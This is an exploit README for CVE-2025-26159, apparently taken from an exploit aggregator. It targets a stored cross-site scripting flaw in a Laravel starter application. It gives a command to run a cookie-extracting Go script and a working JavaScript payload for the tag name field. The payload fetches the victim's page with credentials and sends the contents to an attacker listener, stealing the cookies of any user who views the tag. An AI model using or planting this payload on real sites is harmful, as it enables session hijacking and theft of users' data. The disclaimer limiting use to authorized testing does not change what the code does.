## https://sploitus.com/exploit?id=A3A9482E-15FA-566E-A8BB-5696E81F787F
# CVE-2025-26159
> This script may only be used in authorized environments where explicit permission has been granted. The author is not responsible for any misuse, damage, or consequences resulting from the use of this script.
This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.
### Usage
To understand the explotation steps check out this [post](https://godbadtry.github.io/CVE-2025-26159) on my blog.
```bash
go run CVE-2025-26159.go
```
In the tag name field of laravel starter add this payload:
```js
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
```
After a user visits the malicious tag's detail page, you will get his cookies.